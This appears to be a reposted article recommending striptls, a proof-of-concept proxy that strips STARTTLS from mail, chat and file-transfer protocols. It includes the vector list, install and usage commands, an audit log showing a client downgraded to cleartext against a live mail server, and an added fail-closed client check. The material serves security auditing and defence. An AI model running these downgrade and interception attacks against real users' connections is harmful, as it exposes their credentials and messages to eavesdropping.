Tool recommendation: striptls, a PoC implementation of STARTTLS stripping attacks
程序员文章站
2022-04-06 23:12:49
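STARTTLS is an extension to plaintext communication protocols. It offers a way to upgrade a plaintext connection to an encrypted (TLS or SSL) connection instead of using a separate port for encrypted communication.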
striptls is a PoC implementation of STARTTLS stripping attacks. It supports the following vectors:
SMTP
SMTP.StripFromCapabilities - server response capability patch
SMTP.StripWithInvalidResponseCode - client STARTTLS stripping, invalid response code
SMTP.UntrustedIntercept - STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
SMTP.StripWithTemporaryError
SMTP.StripWithError
SMTP.ProtocolDowngradeStripExtendedMode
SMTP.InjectCommand
POP3
POP3.StripFromCapabilities
POP3.StripWithError
POP3.UntrustedIntercept
IMAP
IMAP.StripFromCapabilities
IMAP.StripWithError
IMAP.UntrustedIntercept
IMAP.ProtocolDowngradeToV2
FTP
FTP.StripFromCapabilities
FTP.StripWithError
FTP.UntrustedIntercept
NNTP
NNTP.StripFromCapabilities
NNTP.StripWithError
NNTP.UntrustedIntercept
XMPP
XMPP.StripFromCapabilities
XMPP.StripInboundTLS
XMPP.UntrustedIntercept
ACAP (untested)
ACAP.StripFromCapabilities
ACAP.StripWithError
ACAP.UntrustedIntercept
IRC
IRC.StripFromCapabilities
IRC.StripWithError
IRC.UntrustedIntercept
IRC.StripWithNotRegistered
IRC.StripCAPWithNotregistered
IRC.StripWithSilentDrop
Results:
- [*] client: 127.0.0.1
-     [Vulnerable!] striptls.StripWithInvalidResponseCode at 0xffd3138c
-     [Vulnerable!] striptls.StripWithTemporaryError at 0xffd4611c
-     [ ] striptls.StripFromCapabilities at 0xffd316bc
-     [Vulnerable!] striptls.StripWithError at 0xffd4614c
- [*] client: 192.168.139.1
-     [Vulnerable!] striptls.StripInboundTLS at 0x7f08319a6808
-     [Vulnerable!] striptls.StripFromCapabilities at 0x7f08319a67a0
-     [Vulnerable!] striptls.UntrustedIntercept at 0x7f08319a6870
#> python -m striptls --help    # from pip/setup.py
#> python striptls --help       # from source / root folder
Usage: striptls [options]

       example: striptls --listen 0.0.0.0:25 --remote mail.server.tld:25

Options:
  -h, --help            show this help message and exit
  -v, --verbose         make lots of noise [default]
  -l LISTEN, --listen=LISTEN
                        listen ip:port [default: 0.0.0.0:]
  -r REMOTE, --remote=REMOTE
                        remote target ip:port to forward sessions to
  -k KEY, --key=KEY     SSL Certificate and Private key file to use, PEM
                        format assumed [default: server.pem]
  -x VECTORS, --vectors=VECTORS
                        Comma separated list of vectors. Use 'ALL' (default)
                        to select all vectors. Available vectors:
                        FTP.StripFromCapabilities, FTP.StripWithError,
                        FTP.UntrustedIntercept, IMAP.StripFromCapabilities,
                        IMAP.StripWithError, IMAP.UntrustedIntercept,
                        NNTP.StripFromCapabilities, NNTP.StripWithError,
                        NNTP.UntrustedIntercept, POP3.StripFromCapabilities,
                        POP3.StripWithError, POP3.UntrustedIntercept,
                        SMTP.ProtocolDowngradeStripExtendedMode,
                        SMTP.StripFromCapabilities, SMTP.StripWithError,
                        SMTP.StripWithInvalidResponseCode,
                        SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
                        XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
                        XMPP.UntrustedIntercept [default: ALL]
1. Install from pip
#> pip install striptls
2. Install from source
#> setup.py install
Example:
                  inbound                    outbound
[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
  smtp-client                   striptls                    remote/target

local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25
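Audit mode iterates over all protocol-specific cases and keeps track of clients that violate the STARTTLS protocol. Press Ctrl+C to abort the audit and print the results.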
#> python striptls --listen localhost:8825 --remote=mail.gmx.net:25
2016-02-02 22:11:56,275 - INFO - ready.
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:21 , proto: FTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:143 , proto: IMAP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:119 , proto: NNTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:110 , proto: POP3):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,275 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:25 , proto: SMTP):
2016-02-02 22:11:56,276 - DEBUG - * added test (port:5222 , proto: XMPP):
2016-02-02 22:11:56,276 - INFO - ]), 110: set([, ]), 143: set([, , ]), 21: set([, , ]), 119: set([, , ]), 25: set([, , , , ])}>
2016-02-02 22:12:08,477 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:08,530 - INFO - client ('127.0.0.1', 28902) has connected
2016-02-02 22:12:08,530 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:08,805 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx001) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:08,805 - DEBUG -
2016-02-02 22:12:09,759 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:09,850 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,851 - DEBUG - [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250-STARTTLS\r\n250 STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - [client] <= [server][mangled] '200 STRIPTLS\r\n'
2016-02-02 22:12:09,867 - DEBUG - [client] => [server][mangled] None
2016-02-02 22:12:09,883 - DEBUG - [client] => [server] 'mail FROM: size=10\r\n'
2016-02-02 22:12:09,983 - DEBUG - [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:09,992 - DEBUG - [client] => [server] 'rset\r\n'
2016-02-02 22:12:10,100 - DEBUG - [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:10,116 - WARNING - terminated.
2016-02-02 22:12:13,056 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:13,056 - INFO - client ('127.0.0.1', 28905) has connected
2016-02-02 22:12:13,057 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:13,241 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:13,241 - DEBUG -
2016-02-02 22:12:14,197 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:14,289 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:14,304 - DEBUG - [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:14,305 - DEBUG - [client] <= [server][mangled] '454 TLS not available due to temporary reason\r\n'
2016-02-02 22:12:14,305 - DEBUG - [client] => [server][mangled] None
2016-02-02 22:12:14,320 - DEBUG - [client] => [server] 'mail FROM: size=10\r\n'
2016-02-02 22:12:14,411 - DEBUG - [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:14,415 - DEBUG - [client] => [server] 'rset\r\n'
2016-02-02 22:12:14,520 - DEBUG - [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:14,535 - WARNING - terminated.
2016-02-02 22:12:16,649 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:16,650 - INFO - client ('127.0.0.1', 28908) has connected
2016-02-02 22:12:16,650 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:16,820 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx003) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:16,820 - DEBUG -
2016-02-02 22:12:17,760 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:17,849 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:17,849 - DEBUG - [client] <= [server][mangled] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n'
2016-02-02 22:12:17,871 - WARNING - terminated.
2016-02-02 22:12:20,071 - DEBUG - - protocol detected (target port)
2016-02-02 22:12:20,072 - INFO - client ('127.0.0.1', 28911) has connected
2016-02-02 22:12:20,072 - INFO - connecting to target ('mail.gmx.net', 25)
2016-02-02 22:12:20,239 - DEBUG - [client] <= [server] '220 gmx.com (mrgmx002) Nemesis ESMTP Service ready\r\n'
2016-02-02 22:12:20,240 - DEBUG -
2016-02-02 22:12:21,181 - DEBUG - [client] => [server] 'ehlo [192.168.139.1]\r\n'
2016-02-02 22:12:21,269 - DEBUG - [client] <= [server] '250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n'
2016-02-02 22:12:21,280 - DEBUG - [client] => [server] 'STARTTLS\r\n'
2016-02-02 22:12:21,281 - DEBUG - [client] <= [server][mangled] '501 Syntax error\r\n'
2016-02-02 22:12:21,281 - DEBUG - [client] => [server][mangled] None
2016-02-02 22:12:21,289 - DEBUG - [client] => [server] 'mail FROM: size=10\r\n'
2016-02-02 22:12:21,381 - DEBUG - [client] <= [server] '530 Authentication required\r\n'
2016-02-02 22:12:21,386 - DEBUG - [client] => [server] 'rset\r\n'
2016-02-02 22:12:21,469 - DEBUG - [client] <= [server] '250 OK\r\n'
2016-02-02 22:12:21,485 - WARNING - terminated.
2016-02-02 22:12:23,665 - WARNING - Ctrl C - Stopping server
2016-02-02 22:12:23,665 - INFO - -- audit results --
2016-02-02 22:12:23,666 - INFO - [*] client: 127.0.0.1
2016-02-02 22:12:23,666 - INFO - [Vulnerable!]
2016-02-02 22:12:23,666 - INFO - [Vulnerable!]
2016-02-02 22:12:23,666 - INFO - [ ]
2016-02-02 22:12:23,666 - INFO - [Vulnerable!]
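Besides audit mode, the tool can strip STARTTLS from the server's capabilities, invalidate the STARTTLS response, perform untrusted SSL interception (which works against clients that do not check whether the server certificate is trusted), and produce an XMPP audit trail.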
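In the audit log above, the client is reported as vulnerable in the sessions where it went on to send `mail FROM` in cleartext after STARTTLS was answered with `200`, `454` or `501`. The following added example (not part of striptls or of the original article) shows the fail-closed client-side check that prevents this fallback; `parse_reply` and `starttls_decision` are hypothetical names, and the sample replies are taken from the log except for the constructed `220` line.

```python
# Added example: fail-closed STARTTLS policy for an SMTP client.
# parse_reply / starttls_decision are hypothetical names, not striptls code.

def parse_reply(raw):
    """Split a (possibly multi-line) SMTP reply into (code, [text, ...])."""
    lines = [ln for ln in raw.split("\r\n") if ln]
    if not lines:
        raise ValueError("empty reply")
    texts = []
    for i, ln in enumerate(lines):
        # RFC 5321: "250-text" continues the reply, "250 text" ends it.
        sep = " " if i == len(lines) - 1 else "-"
        if len(ln) < 3 or not ln[:3].isdigit() or ln[:3] != lines[0][:3]:
            raise ValueError("malformed reply line: %r" % ln)
        if ln[3:4] not in ("", sep):
            raise ValueError("bad separator in reply line: %r" % ln)
        texts.append(ln[4:])
    return int(lines[0][:3]), texts


def starttls_decision(ehlo_raw, starttls_raw):
    """Return ("upgrade", why) or ("abort", why); never "continue in plaintext"."""
    try:
        code, texts = parse_reply(ehlo_raw)
        # texts[0] is the greeting line; the rest are extension keywords.
        keywords = {t.split()[0].upper() for t in texts[1:] if t.strip()}
        if code != 250 or "STARTTLS" not in keywords:
            return ("abort", "STARTTLS not advertised")
        code, _ = parse_reply(starttls_raw)
    except ValueError as exc:
        return ("abort", str(exc))
    if code != 220:  # RFC 3207: only 220 means "go ahead with the handshake"
        return ("abort", "STARTTLS refused with %d" % code)
    # After the handshake the certificate must still be verified, e.g. with
    # ssl.create_default_context(), or an untrusted-certificate intercept succeeds.
    return ("upgrade", "220 received")


EHLO_OK = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n250-SIZE 31457280\r\n"
           "250-AUTH LOGIN PLAIN\r\n250 STARTTLS\r\n")            # from the log
EHLO_STRIPPED = ("250-gmx.com Hello [192.168.139.1] [109.126.64.2]\r\n"
                 "250-SIZE 31457280\r\n250 AUTH LOGIN PLAIN\r\n")  # from the log
STARTTLS_REPLIES = ["200 STRIPTLS\r\n", "454 TLS not available due to temporary reason\r\n",
                    "501 Syntax error\r\n",          # the three above are from the log
                    "220 Ready to start TLS\r\n"]    # constructed genuine reply

if __name__ == "__main__":
    for reply in STARTTLS_REPLIES:
        print(repr(reply), "->", starttls_decision(EHLO_OK, reply))
    print("stripped EHLO ->", starttls_decision(EHLO_STRIPPED, "220 Ready to start TLS\r\n"))
```

A capability list with STARTTLS removed looks the same on the wire as a server that never offered TLS, so this check only helps when requiring TLS is a configured client policy rather than a best-effort upgrade.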